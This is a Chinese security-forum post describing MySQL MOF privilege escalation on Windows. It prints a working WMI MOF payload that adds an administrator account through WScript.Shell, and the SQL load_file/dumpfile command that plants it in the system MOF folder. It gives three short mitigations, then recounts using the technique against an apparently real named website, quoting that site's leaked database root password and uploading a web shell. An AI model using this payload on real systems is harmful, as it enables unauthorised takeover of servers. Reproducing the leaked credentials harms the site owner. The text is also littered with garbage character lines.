中国网络渗透测试联盟
标题:
Mysql mof扩展漏洞实例与防范
[打印本页]
作者:
admin
时间:
2013-1-4 19:49
标题:
Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
: I9 O' n& X; l |; t9 _+ A
$ s" ?( u$ }: o" ^( x: ~' O
网上公开的一些利用代码:
G" I- w9 s" _9 j6 F' G
7 U( P5 u2 p0 W
#pragma namespace(“\\\\.\\root\\subscription”)
; K/ b4 ^+ Y! I5 B
. f: ]$ v9 O8 N
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
" ]1 y1 t; O* T2 {) M& Q2 d# a
0 w0 Q t1 b/ f* }
5 t( I% ~- a5 E
: Y- }) G N/ h; G
- L: Q9 H) u+ e" J4 w
7 {) d9 S0 }# ?" L; x, |& U$ m
连接mysql数据库后执行: select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
; A% c8 {( j I8 y0 B x
从上面代码来看得出解决办法:
2 b( `4 J& f% r5 k
! |, B2 V$ n0 \9 m* N0 O* H; b) K
1、mysql用户权限控制,禁止 “load_file”、”dumpfile”等函数
" G+ {2 U, [. [/ h6 ?) P
$ l; b3 L w! f! z
2、禁止使用”WScript.Shel”组件
* O/ |( Y; h2 C
n7 n$ S; q* m( ~
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
: t$ V+ {( x; z6 B! t' A3 t: w: ~# m2 J
6 ?4 a' n8 x2 e4 H- K5 y( U6 J
当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
; @% s; W9 K9 b- \8 }8 J& n
6 B! u4 o, o# b/ n- V
事情是这样发生的 一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权
b, J% G/ O$ c- {% L1 e
& L6 s. x2 O% s. L- A V
但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容
) |* F4 X, v: ]
5 k4 M. w$ A2 ?' _' S2 G* _) ]; n- H
看懂了后就开始练手吧
" A1 w) c7 b+ y' V# C' N/ ]
) x2 D2 U( x+ R- N- a1 s
http://www.webbmw.com/config/config_ucenter.php
一句话 a
" ~' V' P3 c; v3 Q
8 }( K( T' t3 H O) [! ^% `
$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
( a4 l" {: S' H$ `. f# w" ^$ X
7 n4 D- F7 `: T) m
于是直接用菜刀开搞
" s* I* _9 |1 [/ [5 }7 ]2 D; y' H( q! n
* d7 G! a( k4 o5 P6 w4 l' q
上马先
/ ]- P6 _% t. Q! O' {2 D( \" q) ^
7 o4 p4 c" T, H* s7 f3 U. E8 A
既然有了那些账号 之类的 于是我们就执行吧…….
# s7 s, G* c1 F3 q8 R7 C" ]
7 H; k9 W/ L8 ~4 \$ e
小小的说下
' \+ ~; p6 H, o6 a' r' o
7 z& b z6 z: r1 A, Y1 v
在这里第1次执行未成功 原因未知
0 L' N- m8 B y" K+ p
% _5 _4 |, g$ ?! v% P+ P& F
我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。
% Y: u$ f5 x* `7 B
' d& A3 Y6 `6 B" r8 I
#pragma namespace(“\\\\.\\root\\subscription”)
5 L" e& U. ^: L" o
5 b; D4 b B: H) x9 W+ j. e
instance of __EventFilter as $EventFilter { EventNamespace = “Root\\Cimv2″; Name = “filtP2″; Query = “Select * From __InstanceModificationEvent ” “Where TargetInstance Isa \”Win32_LocalTime\” ” “And TargetInstance.Second = 5″; QueryLanguage = “WQL”; }; instance of ActiveScriptEventConsumer as $Consumer { Name = “consPCSV2″; ScriptingEngine = “JScript”; ScriptText = “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”; }; instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };
/ n5 ~. g9 J% S8 m& V8 P6 ~5 s4 [; R
: [" s# M1 W3 Z" \" i: S
我是将文件放到C:\WINDOWS\temp\1.mof
+ O, I& A' w. [8 w5 f: ^* N
1 x2 E4 {+ u9 a# a
所以我们就改下执行的代码
5 W7 G) V, J7 n1 B5 N3 i
8 c1 S- A& o& f
select load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
! q% V4 q' J' }9 _. c4 `
% X, P& |7 c6 b/ `
. [$ @! U% g4 \1 K( i+ l
& O* k8 u5 l4 Y5 w1 i
但是 你会发现账号还是没有躺在那里。。
# D5 ?9 V; X/ [7 w" k0 y% c
4 _: _0 d- W4 M; }0 K
于是我就感觉蛋疼
( y7 x! a$ v! M, ]
8 h1 ?9 h" g6 T3 I2 f
就去一个一个去执行 但是执行到第2个 mysql时就成功了………
# m j# M7 v9 _6 M
7 q& k6 t- {# _
, o; ^: W3 [( |5 b" g
v- p. S& z2 j
但是其他库均不成功…
. y' Z2 }3 s4 \. ~+ U5 R2 \9 I
* h, X: e+ [. ]
我就很费解呀 到底为什么不成功求大牛解答…
: k8 e8 P v% D# U5 H! }; \
% K: S- G y# x" |3 R1 u% N$ J
3 n* h7 ^3 o' C2 E( h/ L
}& w' G$ x: j7 x( @2 G" x, m8 M
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2